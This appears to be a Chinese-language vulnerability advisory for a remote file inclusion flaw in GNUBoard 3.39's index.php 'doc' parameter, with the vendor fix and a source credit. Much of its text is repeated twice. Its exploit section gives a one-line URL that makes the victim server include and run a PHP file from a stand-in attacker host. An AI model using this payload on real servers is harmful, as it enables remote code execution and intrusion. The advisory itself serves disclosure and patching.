GNUBoard PHP远程注入漏洞
添加时间:
2005-08-18
系统编号:
WAVDB-00612
BUGTRAQ: 11948
影响版本:
GNUBoard 3.39
程序介绍:
解决方案:
厂商补丁:
SIR
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到GNUboard 3.40:
http://sir.co.kr/?doc=bbs/gnuboa ... s&page=1&wr_id=1871
信息来源:
<*来源:Jeremy Bae (swbae@stgsecurity.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110313585810712&w=2
*>
2005-08-18
系统编号:
WAVDB-00612
BUGTRAQ: 11948
影响版本:
GNUBoard 3.39
程序介绍:
GNUBoard是流行的WEB论坛程序。
漏洞分析:
GNUBoard没有正确过滤用户提交的输入,远程攻击者可以利用这个漏洞以WEB进程权限执行任意命令。
问题是 index.php 脚本对 doc 参数缺少充分过滤,提交远程服务器上的文件作为包含参数,可导致以WEB权限执行指定服务器上文件的恶意命令。
漏洞利用:
http://[victim]/gnu3/index.php?doc=http://[attacker]/[attack].php
解决方案:
厂商补丁:
SIR
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到GNUboard 3.40:
http://sir.co.kr/?doc=bbs/gnuboa ... s&page=1&wr_id=1871
信息来源:
<*来源:Jeremy Bae (swbae@stgsecurity.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110313585810712&w=2
*>